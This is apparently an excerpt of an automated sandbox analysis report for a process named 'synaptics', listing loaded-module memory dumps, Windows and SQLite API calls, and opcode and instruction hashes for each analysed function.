                                                                                                                                                                                                              • Instruction ID: 305d474f5633e850a33ce8def77d889216c5bfc20404217ebfe257bd93280b0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9262bbadf58f132da5cacdbddbfe08c5f0781e801d4b19b2514be61d0f13566e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8313875D5521D9BDF10DFA8C9897CCBBB8AF08304F1040EAE409AB261EB759A898F44
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6BF81878
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6BF8189E
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6BF81928
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6BF81944
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BF81964
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6BF8196E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: 2be2f9d84fc4f53f129cb64d7d9e70156eed83832a4c21ffd1c9eaebea15e9c9
                                                                                                                                                                                                              • Instruction ID: eac7f633486ce7fe4dbe8f0fd63043f92a6dc72ae74a5b33775232f88a4c3cd9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2be2f9d84fc4f53f129cb64d7d9e70156eed83832a4c21ffd1c9eaebea15e9c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A313A75E152289BDF11DF64C949BCCBBB8AF09304F1041DAE408AB250EB749B848F44
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6C051878
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6C05189E
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6C051928
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6C051944
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C051964
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6C05196E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: 5ffff0190c6532be19ceafc506667c56c48e5d885b548247c359071b7d98e528
                                                                                                                                                                                                              • Instruction ID: f4376c7a08d2f02d03497878c8e2bd2686bba355d7b7edfad68f889d8461407e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ffff0190c6532be19ceafc506667c56c48e5d885b548247c359071b7d98e528
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F731FBB5D05218ABDF10DFA4DA49BCDBBF8AF09304F50419AE40DA7240EB759A94CF45
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6BF31878
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6BF3189E
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6BF31928
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6BF31944
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BF31964
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6BF3196E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: 6015a64c9c9449dd8307a5136b02c097213f5046216749b14ce04d0bfa79fc48
                                                                                                                                                                                                              • Instruction ID: e2b084b6d849592290dd84be297997f473ccd97470338f9a1f23ac6c38ad6d5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6015a64c9c9449dd8307a5136b02c097213f5046216749b14ce04d0bfa79fc48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9731FAB5D15229DBDF21DF64C9497CCBBB8AF08308F1041DAE409A7250EB759B848F45
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6C0AF2FD
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6C0AF323
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6C0AF3AD
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6C0AF3C9
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C0AF3E9
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6C0AF3F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: ad64293e0d416f57b4113ca2aaaf27b62b99899f9b40e724d1d42d94d7918d4a
                                                                                                                                                                                                              • Instruction ID: 81b4bff407cbcb4ab0e3d217ae53a3c11d25dae1a4508503a830f3c83f048ff6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad64293e0d416f57b4113ca2aaaf27b62b99899f9b40e724d1d42d94d7918d4a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2531F8B5D0521CDBDB10DFA4C9897CDBBF8AF08304F1041AAE54DAB250EB759A858F49
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/SHA1.c,0000012A,00000014,00000014,6C051EFC), ref: 6C05216D
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000040,?,00000014,00000014,6C051EFC), ref: 6C0521BF
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000040,?,00000014,00000014,6C051EFC), ref: 6C0521E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$_wassert
                                                                                                                                                                                                              • String ID: hs->curlen < BLOCK_SIZE$src/SHA1.c
                                                                                                                                                                                                              • API String ID: 3746435480-330188172
                                                                                                                                                                                                              • Opcode ID: 50f74e1f9cdb900fbcf1fd0524f4d9cc28a517be9dab0dc870bbc89c9533be25
                                                                                                                                                                                                              • Instruction ID: d2f362ec6cadeb7fa578b41e4a20278581ed6c06b006135d0371222a6d400ede
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50f74e1f9cdb900fbcf1fd0524f4d9cc28a517be9dab0dc870bbc89c9533be25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20519620219BD19FC3258B6D8540696FFF06F66105B488A5ED4E6C7F43C258F66CC7B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_mprintf.SQLITE3(6C1C85BC,?,?,?,?,?), ref: 6C17ADCD
                                                                                                                                                                                                                • Part of subcall function 6C0C83E0: sqlite3_initialize.SQLITE3 ref: 6C0C83E3
                                                                                                                                                                                                              • sqlite3_mprintf.SQLITE3(454C4544,?,?,?), ref: 6C17ADE5
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?), ref: 6C17AE3A
                                                                                                                                                                                                              • sqlite3_bind_value.SQLITE3(?,00000001,00000000,?,?), ref: 6C17AE89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_mprintf$sqlite3_bind_valuesqlite3_freesqlite3_initialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 83815876-0
                                                                                                                                                                                                              • Opcode ID: e1da54d08534020fd24b69c1e26d3eb4d1af2bbbcfba45ee4d3d0a2b9761f750
                                                                                                                                                                                                              • Instruction ID: 378bd2c692a53319bb31af8331356f43d48deec56abfd49603749546340e0081
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1da54d08534020fd24b69c1e26d3eb4d1af2bbbcfba45ee4d3d0a2b9761f750
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00713BB2A003188BEB30CF95D88279EBB71BB65304F50459EE4197BB60DB349A45CF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_result_value.SQLITE3(?,?), ref: 6C10D656
                                                                                                                                                                                                              • sqlite3_result_error_code.SQLITE3(?,00000000), ref: 6C10D686
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_result_error_codesqlite3_result_value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638150151-0
                                                                                                                                                                                                              • Opcode ID: 7dbbfe2d087fbc4a7c67c1fbe76f9143080428595960dca86e713f05621b9efa
                                                                                                                                                                                                              • Instruction ID: 623a8a48cba4a4406c56a750d67539fd6b620f286777491d46872f1983904613
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dbbfe2d087fbc4a7c67c1fbe76f9143080428595960dca86e713f05621b9efa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 127266707093018BD714EF19C49076AB7F1BF99708F25892DE8998BB01EB35E846CF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000D022), ref: 6BF4D018
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 23a17db6316ac46f49851f47af3df7ae42b79d5f2d2c6513680eb1a01e99a4cb
                                                                                                                                                                                                              • Instruction ID: 1977960652345c7810fcc1e7c415526ffae5005c3f5b0c7c018c149efc7bbd73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23a17db6316ac46f49851f47af3df7ae42b79d5f2d2c6513680eb1a01e99a4cb
                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0ce998ece57cae4bce7cbc0203329156aefd1e2417a68218762f46661b41aaaa
                                                                                                                                                                                                              • Instruction ID: 70f4cfbcd5873c52bfa510d748d2e80c7208d4eb09067c5c3997d2bdab01e6a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ce998ece57cae4bce7cbc0203329156aefd1e2417a68218762f46661b41aaaa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC2294B3B547144BDB4CCA2DCC523E9B2D3AFE4214B0E963DA44AD3301FA7DE9494645
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 02f6be246cb4762cdf8ca739e18b0cf0d3d5a98beac5be097a68bee3fcd6cd3d
                                                                                                                                                                                                              • Instruction ID: 9aeb0791e433560c898470239668666d9a6d648ce1ed5a84a7cbdbd1952711df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02f6be246cb4762cdf8ca739e18b0cf0d3d5a98beac5be097a68bee3fcd6cd3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7328432A083154FE308DEB5C85125FF7D2BBC8344F468A3EE5A5E3241DAB4D9069BC6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3090490537.000000006C031000.00000020.00000001.01000000.0000002A.sdmp, Offset: 6C030000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090285061.000000006C030000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090687006.000000006C033000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090881392.000000006C035000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c030000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0ed6b80a9ac183a9137d06472f9d0897178730b9197cdfa62df1b450db237ad7
                                                                                                                                                                                                              • Instruction ID: f13b0410c838917e2a4e5d42d4739be25d95a74c47d60790f0d9046153793909
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ed6b80a9ac183a9137d06472f9d0897178730b9197cdfa62df1b450db237ad7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD191706083408FC75CCF19D4A4A6ABBE1BF88348F14596EF59A87362DB30D958CF4A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3090490537.000000006C031000.00000020.00000001.01000000.0000002A.sdmp, Offset: 6C030000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090285061.000000006C030000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090687006.000000006C033000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090881392.000000006C035000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c030000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: b0ce31686d6b1597d37af2809d0cb453c9313e146f7a2692045e16f57fc09b0d
                                                                                                                                                                                                              • Instruction ID: 6ec28ceb53e639b708581cf9d084a8d1378f72c662281364aed538752aa44177
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0ce31686d6b1597d37af2809d0cb453c9313e146f7a2692045e16f57fc09b0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFC14CB5A083419FC784DF29C881A4ABBE0FF88248F54596EF499D7312E331EA558F46
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9987c642ef97a883e810ead3d9a51d7ff40f03a646633c2ae7bf54fb0e342776
                                                                                                                                                                                                              • Instruction ID: 732193c48eeb4068fbc0eade05d73806a284984c05760856f5630aa1e9128d5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9987c642ef97a883e810ead3d9a51d7ff40f03a646633c2ae7bf54fb0e342776
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C17218804FA6A6D2324F3DC501266B7B0FF55F44F04EB1DDAEAA6952FF31E68D8241
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 4f286656a3cbf768791b7849ca8ecf6e2691cfb746f3eab67c175d2d920276ad
                                                                                                                                                                                                              • Instruction ID: 2812344924bb73015e49eb8cae817108bcb008ccfc072a96029218176cd875d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f286656a3cbf768791b7849ca8ecf6e2691cfb746f3eab67c175d2d920276ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32C1A514808F8696C2224F3DC501166B7B0BF56614F10DB2EDED6B6571FB32B688AB72
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 632333372-0
                                                                                                                                                                                                              • Opcode ID: 5ff5d26b986f8983a5859a86e6ceebfbfcb4a72ebd91d71a8ff9b166f8f00b05
                                                                                                                                                                                                              • Instruction ID: f0e9a63a782ecb5832d59a3c38add5edd0a45fec6fe0e664644dc3e0dd978eea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ff5d26b986f8983a5859a86e6ceebfbfcb4a72ebd91d71a8ff9b166f8f00b05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 981148B57042058FEB10CF6DD890A9AB7E9EF88369B040539E959C7344E631ED1ACBE1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 632333372-0
                                                                                                                                                                                                              • Opcode ID: b3d1502d8d08064400e02f67e71838ed0c1b9235bb8d052bee6668d80e1ab25a
                                                                                                                                                                                                              • Instruction ID: 96a0c7de906619ffcfa9dc5ca1e0a69f66f122115a965b005af1da9e5ea08be8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3d1502d8d08064400e02f67e71838ed0c1b9235bb8d052bee6668d80e1ab25a
